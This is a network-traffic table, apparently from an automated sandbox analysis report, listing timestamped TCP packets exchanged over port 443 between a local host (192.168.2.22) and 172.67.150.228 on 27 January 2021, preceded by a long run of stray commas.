,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 04:10:08.934823990 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:08.955751896 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:08.955820084 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:08.966867924 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:08.987786055 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:08.991009951 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:08.991039991 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:08.991127968 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:08.991194010 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.007441044 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.028314114 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.028361082 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.028420925 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.258133888 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.278976917 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411086082 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411144018 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411187887 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411202908 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411211967 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411237001 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411263943 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411279917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411298037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411341906 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411355019 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411393881 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411396027 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411433935 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411518097 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411556005 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411560059 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411602020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411681890 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411725998 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411737919 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411773920 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.411777973 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.411817074 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.412297010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.412345886 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.412353039 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.412393093 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.412405968 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.412447929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.412451029 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.412498951 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.425246000 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.430470943 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.430490017 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.430562019 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.459711075 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.459739923 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.459760904 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.459789038 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.459806919 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.459825039 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.459867954 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.459875107 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.459878922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.460258007 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.460288048 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.460311890 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.460313082 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.460328102 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.460331917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.460350037 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.460369110 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.460994005 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.461015940 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.461038113 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.461060047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.461061954 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.461081982 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.461086988 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.461101055 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.461541891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.461982965 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.462007046 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.462028980 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.462038994 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.462049961 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.462055922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.462073088 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.462088108 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.462950945 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.462974072 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.462996006 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.463002920 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.463017941 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.463021994 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.463068008 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.463079929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.463937044 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.463957071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.463990927 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.466783047 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.466799974 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.482501984 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.482558966 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.482597113 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.482601881 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.482621908 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.482634068 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.482639074 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.482656002 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.516385078 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.516428947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.516478062 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.516486883 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.516515017 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.516519070 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.516536951 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.516551971 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.516623020 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.516660929 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.516668081 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.516685963 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.516705036 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.516729116 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.517082930 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.517122030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.517131090 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.517159939 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.517177105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.517200947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.517220020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.517245054 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.518110037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.518153906 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.518158913 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.518166065 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.518201113 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.518207073 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.518238068 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.518245935 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.518284082 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.519072056 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.519109964 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.519121885 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.519148111 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.519153118 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.519186020 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.519200087 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.519224882 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.520159960 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.520200968 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.520212889 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.520236969 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.520246029 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.520282030 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.520283937 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.520332098 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.521053076 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.521095991 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.521109104 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.521131039 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.521138906 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.521167994 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.521183014 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.521214008 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.522042036 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.522083044 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.522092104 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.522119045 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.522125006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.522165060 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.522167921 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.522217035 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.522602081 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.522941113 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.522977114 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.522991896 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.523017883 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.523022890 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.523063898 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.523066998 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.523109913 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.523986101 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.524034977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.524035931 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.524075985 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.524082899 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.524112940 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.524118900 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.524157047 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.524492025 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.524508953 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.524877071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.524908066 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.524930954 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.524935007 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.524943113 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.524981976 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.539788008 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.539810896 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.539839983 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.539860010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.539881945 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.539887905 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.539895058 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.539907932 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.539912939 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.539926052 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.539941072 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.539958954 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.574131966 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.574182987 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.574215889 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.574238062 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.574260950 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.574307919 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.574315071 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.575334072 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.575386047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.575401068 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.575428963 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.575438023 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.575465918 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.575488091 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.575505972 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.575736046 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.575773954 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.575803995 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.575812101 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.575815916 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.575849056 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.575865984 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.575896978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.576658010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.576699972 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.576719046 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.576730967 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.576747894 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.576771021 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.577137947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.577193022 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.577204943 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.577229977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.577246904 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.577266932 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.577276945 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.577321053 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.578151941 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.578193903 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.578219891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.578229904 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.578232050 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.578267097 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.578277111 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.578320026 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.578999996 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.579044104 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.579056978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.579080105 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.579108953 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.579123020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.579125881 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.579169989 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.579305887 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.579921007 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.579960108 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.579976082 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.579998016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.580003977 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.580035925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.580044985 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.580079079 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.580895901 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.580938101 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.580951929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.580975056 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.580986023 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.581021070 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.581021070 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.581072092 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.581737995 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.581780910 CET	443	49165	172.67.150.228	192.168.2.22
